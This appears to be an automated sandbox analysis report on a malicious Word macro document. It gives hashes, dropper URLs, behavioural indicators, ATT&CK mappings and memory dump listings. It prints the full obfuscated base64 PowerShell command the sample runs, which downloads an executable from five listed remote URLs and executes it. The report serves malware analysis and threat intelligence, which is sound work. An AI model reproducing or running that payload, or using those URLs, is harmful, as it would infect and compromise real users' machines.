e484e9b8614dff68bd63e103a395b4e03576c2f72fdcba1ff45344012e0f51b6

Analysis

max time kernel
118s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 04:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ecd96bcfbfd4cf575a8720d72957a998_JaffaCakes118.doc
Size

240KB
MD5

ecd96bcfbfd4cf575a8720d72957a998
SHA1

0cbbf0fa4dff29209e586e9af524668b94ba6f1e
SHA256

e484e9b8614dff68bd63e103a395b4e03576c2f72fdcba1ff45344012e0f51b6
SHA512

ba9379f229a86f3cd69a3e96d43028e7d8589f3071a2d776b2aed284fa7ac5b6b089502833bd0d3d6429882253f53ec4c32c9cf0f6c5cf3ccf7f25f03af6419f
SSDEEP

3072:0j6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkRReZjBu7DgqwXE:0HgtEWPsL/aTyT9GkRRep1qw0

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://ukasian.com/wp-admin/Znk3yozl/

exe.dropper

http://techwala.net/wp-admin/tKX319361/

exe.dropper

http://schladzalniki.eko-bart.pl/cgi-bin/7f53903/

exe.dropper

https://mte1.cn/wp-includes/PkuVF1RiI/

exe.dropper

http://topkadry.com.ua/cgi-bin/dhH718397/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	2732	powersheLL.exe	30

Blocklisted process makes network request 6 IoCs

flow	pid	Process
5	2968	powersheLL.exe
7	2968	powersheLL.exe
9	2968	powersheLL.exe
10	2968	powersheLL.exe
14	2968	powersheLL.exe
15	2968	powersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{95EFBCC8-39D6-4780-BB00-9FB82DAA5B85}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
884	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2968	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
884	WINWORD.EXE
884	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 884 wrote to memory of 1744	884	WINWORD.EXE	34
PID 884 wrote to memory of 1744	884	WINWORD.EXE	34
PID 884 wrote to memory of 1744	884	WINWORD.EXE	34
PID 884 wrote to memory of 1744	884	WINWORD.EXE	34

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecd96bcfbfd4cf575a8720d72957a998_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:884
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABUAGgAMABjAGYAdAAzAD0AKAAnAFUAOABuAHoAJwArACcAagBnACcAKwAnAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBwAFwATwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGkAdABgAFkAcAByAGAATwBUAG8AQwBgAG8AbAAiACAAPQAgACgAJwB0AGwAcwAxACcAKwAnADIALAAgAHQAbABzADEAJwArACcAMQAnACsAJwAsACAAdABsAHMAJwApADsAJABXAF8AYgA2AHEAeQAxACAAPQAgACgAJwBWAGQANQB2ACcAKwAnADYANQAnACsAJwAwACcAKQA7ACQAVgB3AHYAdwAyAGwAcAA9ACgAJwBCAG8AbgAnACsAJwA3ADMANwByACcAKQA7ACQAUwB6AHQANAA5AGYAMAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcAewAnACsAJwAwAH0ATwBmACcAKwAnAGYAaQBjAGUAMgAwADEAOQB7ADAAfQAnACkAIAAgAC0ARgBbAEMASABBAHIAXQA5ADIAKQArACQAVwBfAGIANgBxAHkAMQArACgAJwAuACcAKwAnAGUAeABlACcAKQA7ACQAWABlAGIAYgA0AGoAagA9ACgAJwBQAHUAYgBtADUAJwArACcAZQAzACcAKQA7ACQARQA0ADEAdABrAG8AeAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBDAEwAaQBFAG4AVAA7ACQAUQAzAGUAcgB3ADMAZwA9ACgAJwBoAHQAdABwACcAKwAnADoAJwArACcALwAvAHUAawBhAHMAaQBhAG4ALgBjAG8AbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwAvAFoAbgAnACsAJwBrACcAKwAnADMAeQBvAHoAbAAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKwAnAGUAYwBoAHcAYQBsAGEALgAnACsAJwBuAGUAdAAnACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvACcAKwAnAHQASwBYADMAJwArACcAMQA5ADMANgAxAC8AJwArACcAKgBoAHQAdABwADoALwAvAHMAYwBoACcAKwAnAGwAYQAnACsAJwBkAHoAJwArACcAYQBsAG4AaQBrAGkALgBlACcAKwAnAGsAbwAtAGIAJwArACcAYQByAHQAJwArACcALgBwAGwALwAnACsAJwBjAGcAaQAtAGIAaQAnACsAJwBuAC8AJwArACcANwBmADUAMwAnACsAJwA5ADAAMwAvACoAaAAnACsAJwB0AHQAcABzACcAKwAnADoALwAvAG0AdABlACcAKwAnADEALgBjACcAKwAnAG4ALwB3AHAALQBpAG4AYwAnACsAJwBsAHUAZABlAHMALwBQAGsAdQBWAEYAJwArACcAMQBSAGkASQAvACoAaAB0AHQAJwArACcAcAA6AC8ALwB0AG8AJwArACcAcABrACcAKwAnAGEAZAByAHkALgBjAG8AbQAuAHUAJwArACcAYQAnACsAJwAvAGMAZwBpAC0AYgBpACcAKwAnAG4ALwBkACcAKwAnAGgASAA3ADEAJwArACcAOAAzADkANwAnACsAJwAvACcAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHIAagB1ADkAZwB6AD0AKAAnAE0AZwAnACsAJwB3ADcANAAnACsAJwB0ADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVgA0AGEAZQBkADEAMAAgAGkAbgAgACQAUQAzAGUAcgB3ADMAZwApAHsAdAByAHkAewAkAEUANAAxAHQAawBvAHgALgAiAEQAbwBXAG4AYABMAE8AYABBAEQARgBJAGwARQAiACgAJABWADQAYQBlAGQAMQAwACwAIAAkAFMAegB0ADQAOQBmADAAKQA7ACQAUQB3AHoAMgA0ADkAegA9ACgAJwBKADgAXwBnAGsAJwArACcAZABtACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAHoAdAA0ADkAZgAwACkALgAiAEwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA5ADIANAA4ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFMAegB0ADQAOQBmADAAKQA7ACQATQB3AGsAeAA4AGoAMgA9ACgAJwBPACcAKwAnAHUAdwAnACsAJwB4AG8ANwBkACcAKQA7AGIAcgBlAGEAawA7ACQAQwB6AGkAcABiAGUAbQA9ACgAJwBSAGgAYgAnACsAJwBnACcAKwAnAHMAaABvACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBqAG0AOABwAGwAMgA9ACgAJwBZAGwAaQAnACsAJwBuAGQAOQBfACcAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
f104f04780b116b1ea7d640456820723

SHA1
4158a550615ea26c2eef840cfd1d21396e2606ec

SHA256
a815db304209d289bd3d6f0400143d1153739ac9c6e36a7165c947e8e7e78645

SHA512
b062542ca711600624807b2813faacb4744071686cad59cf6097171cbae9cedef3418fbd70c5f0a928f793ad0b6c68dc666754cbd402117b49fa8d61c703271a

Download Submit
memory/884-23-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-22-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-6-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-5-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-8-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-11-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-10-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-9-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-7-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-16-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-19-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-14-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-21-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-20-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-17-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-18-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-15-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-13-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-12-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-0-0x000000002F991000-0x000000002F992000-memory.dmp

Filesize
4KB

Download
memory/884-2-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/884-26-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-24-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-25-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-28-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-29-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-27-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-32-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-31-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-30-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-62-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/884-63-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-40-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/884-41-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-42-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-43-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-44-0x00000000007D0000-0x00000000008D0000-memory.dmp

Filesize
1024KB

Download
memory/884-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/884-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2968-39-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/2968-38-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download